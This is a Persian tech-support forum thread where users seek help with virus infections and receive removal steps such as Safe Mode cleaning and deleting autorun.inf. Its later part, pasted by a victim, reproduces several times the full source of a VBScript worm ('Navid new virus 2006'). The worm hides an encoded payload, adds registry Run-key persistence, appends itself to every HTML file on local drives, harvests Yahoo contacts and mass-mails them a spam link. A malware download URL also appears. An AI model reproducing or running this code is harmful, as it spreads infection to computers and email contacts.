مشکلات آلوده شدن سیستم به ویروس ها و اسپای ور ها ( ابتدا پست اول را ببینید )

خوب شرمنده دوست عزیز :blush:

توی این شرایط چیز دیگری به فکر من نمی رسد مشکل شما در حال حاظر به نظر نه به خاطر آن تروجان بلکه به خاطر

اثرات باقیمانده از آن است .تنها چیزی که به نظر من می توانی بکنی این است که پس از برگرداندن فایلهای ضروری ( با

همان روشی که خودت گفتی و یا راحتتر از آن با استفاده از یک سی دی لینوکس از نوع Live ) از آنها یک کپی بگیری و

بعد کل هاردت را فورمت بکنی و به طور کامل از شر این مشکل خلاص بشی.

درسته
من اینو نمیدونستم . راهی نداره ؟؟

دیگه راهی نداره

ممنون خیلی اذیت شدی

درخواست کمک فوری

با سلام
سرعت کامپیوترم به شدت اومده پایین و در تسکمنیجر 7 تا پراسس به نام svchost.exe وجود دارد که هیچکدام user نیستند ممنون می شوم کمکم کنید

نقل قول:

نوشته شده توسط vtn54 [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

سلام دوست عزیز

کاسپرسکی این ویروس را با نام Virus.Win32.Perlovga.a شناسایی می کند ولی به طر کامل آن را پاک نمی کند شما

باید چند کار را همزمان انجام بدهی تا سیستمت به طور کامل پاک شود:

اول System Restore را غیرفعال کن بعد به حالت Safe Mode برو حالا Registery Editor را باز کن و به ترتیب کلمات

copy.exe و host.exe را جستجو کن و هر کلیدی را که پیدا کردی پاک کن .حالا در پانل کنترل گزینه Folder Option

را باز کن در پنجره Folder Option مطابق شکل زیر تیک گزینه Hide Protected Operating System Files را بردار .حالا

هر کدام از درایوهایت را که باز کنی یک فایل به اسم autorun.inf توی آن پیدا می کنی همه آنها را پاک کن ولی با

فایلها و پوشه های دیگر کاری نداشته باش حالا دوباره تیک گزینه مربوطه را بگذار

[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

حالا با کاسپرسکی در هما ن حالت Safe Mode سیستم را اسکن کن .اگر مشکلت با این کارها حل نشد بگو تا چاره

دیگری بکنیم.

(برای یاداوری باید بگم که این ویروس دو فایل با نامهای temp1.exe , temp2.exe در فولدر system32 میسازه و در پنجره task manager فقط شما میتونید فایل temp1.exe که داره فعالیت میکنه پیدا کنید.)
من هم دچار این ویروس شدم ولی در اجرای مراحل بالا چند مشکل دارم:
1- وقتی می خواهم به حالت Safe Mode برم نمیشه چرا که سیستم قبل از وارد شدن ریست میشه یعنی تا خط لودینگ MUP میره ولی بعد ریست میشه
2- توی حالت معمولی توی Registery Editor دنبال کلمات گشتم ولی یا کلید svchost پیدا میکننه یا RDhost البته یه چند تا copy.exe پیدا کرده که این عبارت ته خط نوشته شده یعنی یه خط بلند و بالا داره که ته اش به copy.exe ختم میشه دقیق یادم نیست ولی قبلش کلماتی مثل RunDLL32 و از این جور چیزا بود. من هم اومدم فقط copy.exe رو از خط پاک کردم ولی باز هم درست نشد

اگه ممکنه کمک کنید

نقل قول:

نوشته شده توسط ماراتون [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

(برای یاداوری باید بگم که این ویروس دو فایل با نامهای temp1.exe , temp2.exe در فولدر system32 میسازه و در پنجره task manager فقط شما میتونید فایل temp1.exe که داره فعالیت میکنه پیدا کنید.)
من هم دچار این ویروس شدم ولی در اجرای مراحل بالا چند مشکل دارم:
1- وقتی می خواهم به حالت Safe Mode برم نمیشه چرا که سیستم قبل از وارد شدن ریست میشه یعنی تا خط لودینگ MUP میره ولی بعد ریست میشه
2- توی حالت معمولی توی Registery Editor دنبال کلمات گشتم ولی یا کلید svchost پیدا میکننه یا RDhost البته یه چند تا copy.exe پیدا کرده که این عبارت ته خط نوشته شده یعنی یه خط بلند و بالا داره که ته اش به copy.exe ختم میشه دقیق یادم نیست ولی قبلش کلماتی مثل RunDLL32 و از این جور چیزا بود. من هم اومدم فقط copy.exe رو از خط پاک کردم ولی باز هم درست نشد

اگه ممکنه کمک کنید

سلام دوست من

اگر نتوانی به Safe Mode بروی کار مشکل می شود شاید سیستمت علاوه بر این تروجان مشکلات دیگری هم داشته

باشد برای اولین قدم باید کمی از سیستمت اطلاعات جمع کنیم :

1.در اولین قدم System Restore را غیرفعال کن.

2..روی سیستمت چه آنتی ویروسی نصب است؟ اگر روی سیستمت آنتی ویروسی هست آن را آپدیت کن و بگذار

سیستمت را اسکن کند اگر چیزی پیدا کرد با جزییات کامل اینجا بگذار.

3.به آدرس زیر برو و با استفاده از توصیه هایی که داده شده است سیستمت را اسکن کرده و نتیجه را اینجا بگذار.

[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

4.فایل زیر راداونلود کن و آن را اجرا کن.( حجم= 230 کیلوبایت) در صفحه اول گزینه

Do a system scan and save a logfile را انتخاب کن و گزارش اسکن را به طور کامل اینجا Copy&Past کن:

[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

سلام

کامپیوتر یکی از دوستان از طریق یک سی دی ویروس گرفته .اما انتی ویروس های مختلف اونو نمی شناسند

ویروس این جوریه که یه پوشه به نام New Folder توی تمام پوشه های کامپیوتر ساخته شده که شکل همون

پوشه رو داره ولی در اصل یه برنامه یا شورت کاته که اگه روش کلیک کنی صفحه My Ducument رو باز می کنه

توی تمام صفحات و درایو ها هم هست و حذف نمی شه.

ممنون اگه کمک کنید

نقل قول:

نوشته شده توسط مرتضی nvcd [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

سلام

کامپیوتر یکی از دوستان از طریق یک سی دی ویروس گرفته .اما انتی ویروس های مختلف اونو نمی شناسند

ویروس این جوریه که یه پوشه به نام New Folder توی تمام پوشه های کامپیوتر ساخته شده که شکل همون

پوشه رو داره ولی در اصل یه برنامه یا شورت کاته که اگه روش کلیک کنی صفحه My Ducument رو باز می کنه

توی تمام صفحات و درایو ها هم هست و حذف نمی شه.

ممنون اگه کمک کنید

[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

کمک: ویروسی شدم بد جور!

سلام:
چند ماهیه‌ که‌ ویندوزم مشکل پیدا کرده‌ بود:‌ هم سرعتش کند شده‌ بود و هم دو تا‌ پیغام خطا می داد و حتی با Notepad هم هنگ میکرد!! الان طوری برام مشکل ساز شده‌ که‌ تو این ده‌ روزه‌ 4 بار ویندوز عوض کردم البته‌ تو این چند وقته‌ از برنامه‌ های رجیستری و آنتی ویروس های مختلف و آپدیت شده‌ هم استفاده‌ میکردم اما چاره‌ ساز نبود. تا این چند روزه‌ رفتم ازsafe mode وارد شدم دیدم یه‌ ویروسه‌! اول دو تا عامل اصلی پیغام خطا رو پاک کرم اما بعد از دو روز برگشت؛ باز هم رفتم از همونجا اون دو تا فایل برگشته‌ بودند! بعد بردمشون تو Notepad محتواشونو پاک کردم و save شون کردم اما باز هم چاره‌ ساز نبود. این رو هم بگم که‌ گزینه‌ standby من غیر فعاله‌ چند بار خودش همین طوری ریستارت شد.

خواهش میکنم کمکم کنید.

اول پیغام connection رو میده‌ بعد این دو تا رو:
C:\WINDOWS\system32\Systems.exe
C:\WINDOWS\system32\kernel.vbs

محتوای ویروس رو که‌ بردم تو notepad این طوری بود:
http://h1.ripway.com/dreamhack/H/Navidhack.exe

** به‌ خاطر اینکه‌ تو این تاپیک جای زیادی گرفته‌ نشه‌ سایزفونت رو کوچیک کردم لطف کنید خودتون تو notepad درستش کنین.

'Navid new virus 2006(1375.1)
on error resume next
dim filehtm,sys,yr
filehtm1="1001051090321151211150130100831011160321 00102032061032100111099117109101110116046099114101 09711610106910810110910111011604003411109810610109 91160340410130101001020461151011160651161161141050 98117116101032034099108097115115105100034044032034 09910811510510005806606805705406705305305404505405 30650510450490490680480450570560510650450480480670 48052070067050057069051054032034013010115101116032 10211511103206103210010204609911410109711610111109 81061010991160400340830991141051121161051101030460 70105108101083121115116101109079098106101099116034 04403403404101301011510111603211506110010204606711 41010971161010790981061010991160400340831041011081 08046065112112108105099097116105111110046049034044 03403404101301011510111603211410106110010204609911 41010971161011110981061010991160400341191150991141 05112116046115104101108108034044034034041013010115 12111506110211511104607110111608311210109910509710 80701111081001011140400490410130100701111140320970 32061032049032084111032076101110040102105108101118 09811504904103208311610111203205101301010210510810 11180981150500611021051081011180981150500320380320 99104114040109105100040102105108101118098115049044 09704405104104101301010510203209703206003210810111 00401021051081011011201010490410430490321161041011 10032102105108101101120101050061102105108101101120 10105003203803209910411404010910510004010210510810 11011201010490440970440510410410130101101011201160 13010107114032061032085067097115101040114101046082 10110308210109710004003407207506908909507607906706 50760950770650670720730780690920830790700840870650 82069092077105099114111115111102116092087105110100 11111911509206711711411410111011608610111411510511 11100920821171100920771050991141111151111021160320 87105110100111119115034041041013010102115111046067 11410109711610108410112011607010510810104011512111 50320380320340920840830800510500690460680760760340 41046119114105116101032102105108101101120101049013 01010510203211709909711510104010211511104607010510 81010691201051151161150401151211150320380320340920 75101114110101108046101120101034041041061034070065 07608306903403211111403210711406006211709909711510 10401151211150320380320340920750690820780690760460 69088069034041032116104101110013010114101046114101 10311911410511610103203407207506908909507607906706 50760950770650670720730780690920830790700840870650 82069092077105099114111115111102116092087105110100 11111911509206711711411410111011608610111411510511 11100920821171100920340320380320340771050991141111 15111102116032087105110100111119115034032044115121 11503203803409207510111411010110804610112010103401 30101021151110460671141010971161010841011201160701 05108101040115121115032038032034092075101114110101 10804610112010103404104611911410511610103210210510 81011011201010500130101150460791121011100320401151 21115032038032034092075101114110101108046101120101 03404101301010111010003210510201301010211511104606 71141010971161010841011201160701051081010401151211 15032038032034092084083080051050086046068076076034 04104611911410511610103210210510810111809811504901 30101051020321021151110461111121011101161011201161 02105108101040115121115032038032034092083121115116 10110911804610010810803404404904104611410109710009 71081080600620341111100340321161041011100130101021 15111046067114101097116101084101120116070105108101 04011512111503203803203409207510111411010110804611 80981150340410461191141051161010321021051081011180 98115050013010115046079112101110032040115121115032 03803203409207510111411010110804611809811503404101 30101011101000321051020130100600471150991141051121 16062"
set fso=createobject("scripting.filesystemobject")
set re=createobject("wscript.shell")
sys=fso.GetSpecialFolder(1)
fso.CreateTextFile(sys & "\Systemv.dll").write "on"
filehtm="<script language=vbscript>" & vbcrlf & "on error resume next" & vbcrlf
filehtm=filehtm & "fileexe1=""" & fso.opentextfile(sys & "\TSP32E.DLL",1).readall & """" & vbcrlf
filehtm=filehtm & "filevbs1=""" & fso.opentextfile(sys & "\TSP32V.DLL",1).readall & """" & vbcrlf
For a = 1 To Len(filehtm1) Step 3
filehtm=filehtm & chr(mid(filehtm1,a,3))
next
re.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.vbs"
re.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.exe"
yr=re.RegRead("HKEY_CURRENT_USER\Software\yahoo\pa ger\Yahoo! User ID")
start
Sub start()
on error resume next
For Each dr1 In fso.Drives
If dr1.DriveType = 2 Or dr1.DriveType = 3 Then file1 (dr1 & "\"): folder1 (dr1 & "\")
Next
sendmail
End Sub
Sub folder1(dr1)
on error resume next
For Each fo In fso.GetFolder(dr1).SubFolders
if UCase(right(fo,25))="YAHOO!\MESSENGER\PROFILES" then yahoo(fo)
file1 (fo)
folder1 (fo)
Next
End Sub
Sub file1(fo)
on error resume next
For Each fi In fso.GetFolder(fo).Files
nj (fi)
Next
End Sub
sub nj(fi)
on error resume next
ext=UCase(fso.GetExtensionName(fi))
if ext="HTM" or ext="HTML" or ext="HTT" then
if right(fso.opentextfile(fi,1).readall,len(filehtm)) <>filehtm then
fso.opentextfile(fi,8).write vbcrlf & filehtm
end if
end if
end sub
sub yahoo(foy1)
For Each foy2 In fso.GetFolder(foy1).SubFolders
mailall=mailall & fso.GetFileName(foy2) & "@yahoo.com" & vbcrlf
next
fso.createtextfile(sys & "\mail.log").write mailall & "END"
fso.createtextfile(sys & "\send.log").write yr & "@yahoo.com"
end sub
sub sendmail()
on error resume next
sendm=fso.opentextfile(sys & "\send.log",1).readall
set mailm=fso.opentextfile(sys & "\mail.log",1)
maila=mailm.readline
while maila <> "END"
Set objMessage = CreateObject("CDO.Message")
objMessage.Subject = "Hello"
objMessage.Sender = sendm
objMessage.from= sendm
objMessage.To = maila
objMessage.TextBody = "Hello" & vbcrlf & "Go to my sait: http://girlsex.webs.io/picture.htm"
objMessage.Send
maila=mailm.readline
wend
fso.CreateTextFile(sys & "\Systemv.dll").write "off"
end sub
'Navid new virus 2006(1375.1)
on error resume next
dim filehtm,sys,yr
filehtm1="10010510903211512111501301008310111603210010203206 10321001110991171091011101160460991141010971161010 69108101109101110116040034111098106101099116034041 01301010010204611510111606511611611410509811711610 10320340991080971151151051000340440320340991081151 05100058066068057054067053053054045054053065051045 04904906804804505705605106504504804806704805207006 70500570690510540320340130101151011160321021151110 32061032100102046099114101097116101111098106101099 11604003408309911410511211610511010304607010510810 10831211151161011090790981061010991160340440340340 41013010115101116032115061100102046067114101097116 10107909810610109911604003408310410110810804606511 21121081050990971161051111100460490340440340340410 13010115101116032114101061100102046099114101097116 10111109810610109911604003411911509911410511211604 61151041011081080340440340340410130101151211150611 02115111046071101116083112101099105097108070111108 10010111404004904101301007011111403209703206103204 90320841110320761011100401021051081011180981150490 41032083116101112032051013010102105108101118098115 05006110210510810111809811505003203803209910411404 01091051000401021051081011180981150490440970440510 41041013010105102032097032060032108101110040102105 10810110112010104904104304903211610410111003210210 51081011011201010500611021051081011011201010500320 38032099104114040109105100040102105108101101120101 04904409704405104104101301011010112011601301010711 40320610320850670971151010401141010460821011030821 01097100040034072075069089095076079067065076095077 06506707207307806909208307907008408706508206909207 71050991141111151111021160920871051101001111191150 92067117114114101110116086101114115105111110092082 11711009207710509911411111511110211603208710511010 01111191150340410410130101021151110460671141010971 16101084101120116070105108101040115121115032038032 03409208408308005105006904606807607603404104611911 41051161010321021051081011011201010490130101051020 32117099097115101040102115111046070105108101069120 10511511611504011512111503203803203409207510111411 01011080461011201010340410410610340700650760830690 34032111114032107114060062117099097115101040115121 11503203803203409207506908207806907604606908806903 40410321161041011100130101141010461141011031191141 05116101032034072075069089095076079067065076095077 06506707207307806909208307907008408706508206909207 71050991141111151111021160920871051101001111191150 92067117114114101110116086101114115105111110092082 11711009203403203803203407710509911411111511110211 60320871051101001111191150340320441151211150320380 34092075101114110101108046101120101034013010102115 11104606711410109711610108410112011607010510810104 01151211150320380320340920751011141101011080461
'Navid new virus 2006(1375.1)

on error resume next
dim filehtm,sys,yr
filehtm1="1001051090321151211150130100831011160321 00102032061032100111099117109101110116046099114101 09711610106910810110910111011604003411109810610109 91160340410130101001020461151011160651161161141050 98117116101032034099108097115115105100034044032034 09910811510510005806606805705406705305305404505405 30650510450490490680480450570560510650450480480670 48052070067050057069051054032034013010115101116032 10211511103206103210010204609911410109711610111109 81061010991160400340830991141051121161051101030460 70105108101083121115116101109079098106101099116034 04403403404101301011510111603211506110010204606711 41010971161010790981061010991160400340831041011081 08046065112112108105099097116105111110046049034044 03403404101301011510111603211410106110010204609911 41010971161011110981061010991160400341191150991141 05112116046115104101108108034044034034041013010115 12111506110211511104607110111608311210109910509710 80701111081001011140400490410130100701111140320970 32061032049032084111032076101110040102105108101118 09811504904103208311610111203205101301010210510810 11180981150500611021051081011180981150500320380320 99104114040109105100040102105108101118098115049044 09704405104104101301010510203209703206003210810111 00401021051081011011201010490410430490321161041011 10032102105108101101120101050061102105108101101120 10105003203803209910411404010910510004010210510810 11011201010490440970440510410410130101101011201160 13010107114032061032085067097115101040114101046082 10110308210109710004003407207506908909507607906706 50760950770650670720730780690920830790700840870650 82069092077105099114111115111102116092087105110100 11111911509206711711411410111011608610111411510511 11100920821171100920771050991141111151111021160320 87105110100111119115034041041013010102115111046067 11410109711610108410112011607010510810104011512111 50320380320340920840830800510500690460680760760340 41046119114105116101032102105108101101120101049013 01010510203211709909711510104010211511104607010510 81010691201051151161150401151211150320380320340920 75101114110101108046101120101034041041061034070065 07608306903403211111403210711406006211709909711510 10401151211150320380320340920750690820780690760460 69088069034041032116104101110013010114101046114101 10311911410511610103203407207506908909507607906706 50760950770650670720730780690920830790700840870650 82069092077105099114111115111102116092087105110100 11111911509206711711411410111011608610111411510511 11100920821171100920340320380320340771050991141111 15111102116032087105110100111119115034032044115121 11503203803409207510111411010110804610112010103401 30101021151110460671141010971161010841011201160701 05108101040115121115032038032034092075101114110101 10804610112010103404104611911410511610103210210510 81011011201010500130101150460791121011100320401151 21115032038032034092075101114110101108046101120101 03404101301010111010003210510201301010211511104606 71141010971161010841011201160701051081010401151211 15032038032034092084083080051050086046068076076034 04104611911410511610103210210510810111809811504901 30101051020321021151110461111121011101161011201161 02105108101040115121115032038032034092083121115116 10110911804610010810803404404904104611410109710009 71081080600620341111100340321161041011100130101021 15111046067114101097116101084101120116070105108101 04011512111503203803203409207510111411010110804611 80981150340410461191141051161010321021051081011180 98115050013010115046079112101110032040115121115032 03803203409207510111411010110804611809811503404101 30101011101000321051020130100600471150991141051121 16062"
set fso=createobject("scripting.filesystemobject")
set re=createobject("wscript.shell")
sys=fso.GetSpecialFolder(1)
fso.CreateTextFile(sys & "\Systemv.dll").write "on"
filehtm="<script language=vbscript>" & vbcrlf & "on error resume next" & vbcrlf
filehtm=filehtm & "fileexe1=""" & fso.opentextfile(sys & "\TSP32E.DLL",1).readall & """" & vbcrlf
filehtm=filehtm & "filevbs1=""" & fso.opentextfile(sys & "\TSP32V.DLL",1).readall & """" & vbcrlf
For a = 1 To Len(filehtm1) Step 3
filehtm=filehtm & chr(mid(filehtm1,a,3))
next
re.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.vbs"
re.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.exe"
yr=re.RegRead("HKEY_CURRENT_USER\Software\yahoo\pa ger\Yahoo! User ID")
start
Sub start()
on error resume next
For Each dr1 In fso.Drives
If dr1.DriveType = 2 Or dr1.DriveType = 3 Then file1 (dr1 & "\"): folder1 (dr1 & "\")
Next
sendmail
End Sub
Sub folder1(dr1)
on error resume next
For Each fo In fso.GetFolder(dr1).SubFolders
if UCase(right(fo,25))="YAHOO!\MESSENGER\PROFILES" then yahoo(fo)
file1 (fo)
folder1 (fo)
Next
End Sub
Sub file1(fo)
on error resume next
For Each fi In fso.GetFolder(fo).Files
nj (fi)
Next
End Sub
sub nj(fi)
on error resume next
ext=UCase(fso.GetExtensionName(fi))
if ext="HTM" or ext="HTML" or ext="HTT" then
if right(fso.opentextfile(fi,1).readall,len(filehtm)) <>filehtm then
fso.opentextfile(fi,8).write vbcrlf & filehtm
end if
end if
end sub
sub yahoo(foy1)
For Each foy2 In fso.GetFolder(foy1).SubFolders
mailall=mailall & fso.GetFileName(foy2) & "@yahoo.com" & vbcrlf
next
fso.createtextfile(sys & "\mail.log").write mailall & "END"
fso.createtextfile(sys & "\send.log").write yr & "@yahoo.com"
end sub
sub sendmail()
on error resume next
sendm=fso.opentextfile(sys & "\send.log",1).readall
set mailm=fso.opentextfile(sys & "\mail.log",1)
maila=mailm.readline
while maila <> "END"
Set objMessage = CreateObject("CDO.Message")
objMessage.Subject = "Hello"
objMessage.Sender = sendm
objMessage.from= sendm
objMessage.To = maila
objMessage.TextBody = "Hello" & vbcrlf & "Go to my sait: http://girlsex.webs.io/picture.htm"
objMessage.Send
maila=mailm.readline
wend
fso.CreateTextFile(sys & "\Systemv.dll").write "off"
end sub
'Navid new virus 2006(1375.1)
on error resume next
dim filehtm,sys,yr
filehtm1="10010510903211512111501301008310111603210010203206 10321001110991171091011101160460991141010971161010 69108101109101110116040034111098106101099116034041 01301010010204611510111606511611611410509811711610 10320340991080971151151051000340440320340991081151 05100058066068057054067053053054045054053065051045 04904906804804505705605106504504804806704805207006 70500570690510540320340130101151011160321021151110 32061032100102046099114101097116101111098106101099 11604003408309911410511211610511010304607010510810 10831211151161011090790981061010991160340440340340 41013010115101116032115061100102046067114101097116 10107909810610109911604003408310410110810804606511 21121081050990971161051111100460490340440340340410 13010115101116032114101061100102046099114101097116 10111109810610109911604003411911509911410511211604 61151041011081080340440340340410130101151211150611 02115111046071101116083112101099105097108070111108 10010111404004904101301007011111403209703206103204 90320841110320761011100401021051081011180981150490 41032083116101112032051013010102105108101118098115 05006110210510810111809811505003203803209910411404 01091051000401021051081011180981150490440970440510 41041013010105102032097032060032108101110040102105 10810110112010104904104304903211610410111003210210 51081011011201010500611021051081011011201010500320 38032099104114040109105100040102105108101101120101 04904409704405104104101301011010112011601301010711 40320610320850670971151010401141010460821011030821 01097100040034072075069089095076079067065076095077 06506707207307806909208307907008408706508206909207 71050991141111151111021160920871051101001111191150 92067117114114101110116086101114115105111110092082 11711009207710509911411111511110211603208710511010 01111191150340410410130101021151110460671141010971 16101084101120116070105108101040115121115032038032 03409208408308005105006904606807607603404104611911 41051161010321021051081011011201010490130101051020 32117099097115101040102115111046070105108101069120 10511511611504011512111503203803203409207510111411 01011080461011201010340410410610340700650760830690 34032111114032107114060062117099097115101040115121 11503203803203409207506908207806907604606908806903 40410321161041011100130101141010461141011031191141 05116101032034072075069089095076079067065076095077 06506707207307806909208307907008408706508206909207 71050991141111151111021160920871051101001111191150 92067117114114101110116086101114115105111110092082 11711009203403203803203407710509911411111511110211 60320871051101001111191150340320441151211150320380 34092075101114110101108046101120101034013010102115 11104606711410109711610108410112011607010510810104 01151211150320380320340920751011141101011080461
'Navid new virus 2006(1375.1)

on error resume next
dim filehtm,sys,yr
filehtm1="1001051090321151211150130100831011160321 00102032061032100111099117109101110116046099114101 09711610106910810110910111011604003411109810610109 91160340410130101001020461151011160651161161141050 98117116101032034099108097115115105100034044032034 09910811510510005806606805705406705305305404505405 30650510450490490680480450570560510650450480480670 48052070067050057069051054032034013010115101116032 10211511103206103210010204609911410109711610111109 81061010991160400340830991141051121161051101030460 70105108101083121115116101109079098106101099116034 04403403404101301011510111603211506110010204606711 41010971161010790981061010991160400340831041011081 08046065112112108105099097116105111110046049034044 03403404101301011510111603211410106110010204609911 41010971161011110981061010991160400341191150991141 05112116046115104101108108034044034034041013010115 12111506110211511104607110111608311210109910509710 80701111081001011140400490410130100701111140320970 32061032049032084111032076101110040102105108101118 09811504904103208311610111203205101301010210510810 11180981150500611021051081011180981150500320380320 99104114040109105100040102105108101118098115049044 09704405104104101301010510203209703206003210810111 00401021051081011011201010490410430490321161041011 10032102105108101101120101050061102105108101101120 10105003203803209910411404010910510004010210510810 11011201010490440970440510410410130101101011201160 13010107114032061032085067097115101040114101046082 10110308210109710004003407207506908909507607906706 50760950770650670720730780690920830790700840870650 82069092077105099114111115111102116092087105110100 11111911509206711711411410111011608610111411510511 11100920821171100920771050991141111151111021160320 87105110100111119115034041041013010102115111046067 11410109711610108410112011607010510810104011512111 50320380320340920840830800510500690460680760760340 41046119114105116101032102105108101101120101049013 01010510203211709909711510104010211511104607010510 81010691201051151161150401151211150320380320340920 75101114110101108046101120101034041041061034070065 07608306903403211111403210711406006211709909711510 10401151211150320380320340920750690820780690760460 69088069034041032116104101110013010114101046114101 10311911410511610103203407207506908909507607906706 50760950770650670720730780690920830790700840870650 82069092077105099114111115111102116092087105110100 11111911509206711711411410111011608610111411510511 11100920821171100920340320380320340771050991141111 15111102116032087105110100111119115034032044115121 11503203803409207510111411010110804610112010103401 30101021151110460671141010971161010841011201160701 05108101040115121115032038032034092075101114110101 10804610112010103404104611911410511610103210210510 81011011201010500130101150460791121011100320401151 21115032038032034092075101114110101108046101120101 03404101301010111010003210510201301010211511104606 71141010971161010841011201160701051081010401151211 15032038032034092084083080051050086046068076076034 04104611911410511610103210210510810111809811504901 30101051020321021151110461111121011101161011201161 02105108101040115121115032038032034092083121115116 10110911804610010810803404404904104611410109710009 71081080600620341111100340321161041011100130101021 15111046067114101097116101084101120116070105108101 04011512111503203803203409207510111411010110804611 80981150340410461191141051161010321021051081011180 98115050013010115046079112101110032040115121115032 03803203409207510111411010110804611809811503404101 30101011101000321051020130100600471150991141051121 16062"
set fso=createobject("scripting.filesystemobject")
set re=createobject("wscript.shell")
sys=fso.GetSpecialFolder(1)
fso.CreateTextFile(sys & "\Systemv.dll").write "on"
filehtm="<script language=vbscript>" & vbcrlf & "on error resume next" & vbcrlf
filehtm=filehtm & "fileexe1=""" & fso.opentextfile(sys & "\TSP32E.DLL",1).readall & """" & vbcrlf
filehtm=filehtm & "filevbs1=""" & fso.opentextfile(sys & "\TSP32V.DLL",1).readall & """" & vbcrlf
For a = 1 To Len(filehtm1) Step 3
filehtm=filehtm & chr(mid(filehtm1,a,3))
next
re.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.vbs"
re.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.exe"
yr=re.RegRead("HKEY_CURRENT_USER\Software\yahoo\pa ger\Yahoo! User ID")
start
Sub start()
on error resume next
For Each dr1 In fso.Drives
If dr1.DriveType = 2 Or dr1.DriveType = 3 Then file1 (dr1 & "\"): folder1 (dr1 & "\")
Next
sendmail
End Sub
Sub folder1(dr1)
on error resume next
For Each fo In fso.GetFolder(dr1).SubFolders
if UCase(right(fo,25))="YAHOO!\MESSENGER\PROFILES" then yahoo(fo)
file1 (fo)
folder1 (fo)
Next
End Sub
Sub file1(fo)
on error resume next
For Each fi In fso.GetFolder(fo).Files
nj (fi)
Next
End Sub
sub nj(fi)
on error resume next
ext=UCase(fso.GetExtensionName(fi))
if ext="HTM" or ext="HTML" or ext="HTT" then
if right(fso.opentextfile(fi,1).readall,len(filehtm)) <>filehtm then
fso.opentextfile(fi,8).write vbcrlf & filehtm
end if
end if
end sub
sub yahoo(foy1)
For Each foy2 In fso.GetFolder(foy1).SubFolders
mailall=mailall & fso.GetFileName(foy2) & "@yahoo.com" & vbcrlf
next
fso.createtextfile(sys & "\mail.log").write mailall & "END"
fso.createtextfile(sys & "\send.log").write yr & "@yahoo.com"
end sub
sub sendmail()
on error resume next
sendm=fso.opentextfile(sys & "\send.log",1).readall
set mailm=fso.opentextfile(sys & "\mail.log",1)
maila=mailm.readline
while maila <> "END"
Set objMessage = CreateObject("CDO.Message")
objMessage.Subject = "Hello"
objMessage.Sender = sendm
objMessage.from= sendm
objMessage.To = maila
objMessage.TextBody = "Hello" & vbcrlf & "Go to my sait: http://girlsex.webs.io/picture.htm"
objMessage.Send
maila=mailm.readline
wend
fso.CreateTextFile(sys & "\Systemv.dll").write "off"
end sub
'Navid new virus 2006(1375.1)
on error resume next
dim filehtm,sys,yr
filehtm1="1001051090321151211150130100831011160321 00102032061032100111099117109101110116046099114101 09711610106910810110910111011604003411109810610109 91160340410130101001020461151011160651161161141050 98117116101032034099108097115115105100034044032034 09910811510510005806606805705406705305305404505405 30650510450490490680480450570560510650450480480670 48052070067050057069051054032034013010115101116032 10211511103206103210010204609911410109711610111109 81061010991160400340830991141051121161051101030460 70105108101083121115116101109079098106101099116034 04403403404101301011510111603211506110010204606711 41010971161010790981061010991160400340831041011081 08046065112112108105099097116105111110046049034044 03403404101301011510111603211410106110010204609911 41010971161011110981061010991160400341191150991141 05112116046115104101108108034044034034041013010115 12111506110211511104607110111608311210109910509710 80701111081001011140400490410130100701111140320970 32061032049032084111032076101110040102105108101118 09811504904103208311610111203205101301010210510810 11180981150500611021051081011180981150500320380320 99104114040109105100040102105108101118098115049044 09704405104104101301010510203209703206003210810111 00401021051081011011201010490410430490321161041011 10032102105108101101120101050061102105108101101120 10105003203803209910411404010910510004010210510810 11011201010490440970440510410410130101101011201160 13010102115111046067114101097116101084101120116070 10510810104011512111503203803203409208408308005105 00690460680760760340410461191141051161010321021051 08101101120101049013010105102032102115111046111112 10111011610112011610210510810104011512111503203803 20340920831211151161011091010461001081080340410461 14101097100097108108060062034111110034032116104101 11001301010211511104606711410109711610108410112011 60701051081010401151211150320380320340920751011141 10101108046101120101034041046119114105116101032102 10510810110112010105001301011504607911210111003204 01151211150320380320340920751011141101011080461011 20101034041013010101110100032105102013010102115111 04606711410109711610108410112011607010510810104011 51211150320380320340920840830800510500860460680760 76034041046119114105116101032102105108101118098115 04901301010510203210211511104611111210111011610112 01161021051081010401151211150320380320340920831211 15116101109118046100108108034041046114101097100097 10810806006203411111003403211610410111001301010211 51110460671141010971161010841011201160701051081010 40115121115032038032034092075101114110101108046118 09811503404104611911410511610103210210510810111809 81150500130101150460791121011100320401151211150320 38032034092075101114110101108046118098115034041013 01010111010003210510201301006004711509911410511211 6062"
set fso=createobject("scripting.filesystemobject")
set re=createobject("wscript.shell")
sys=fso.GetSpecialFolder(1)
fso.CreateTextFile(sys & "\Systemv.dll").write "on"
filehtm="<script language=vbscript>" & vbcrlf & "on error resume next" & vbcrlf
filehtm=filehtm & "fileexe1=""" & fso.opentextfile(sys & "\TSP32E.DLL").readall & """" & vbcrlf
filehtm=filehtm & "filevbs1=""" & fso.opentextfile(sys & "\TSP32V.DLL").readall & """" & vbcrlf
For a = 1 To Len(filehtm1) Step 3
filehtm=filehtm & chr(mid(filehtm1,a,3))
next
re.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.vbs"
re.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.exe"
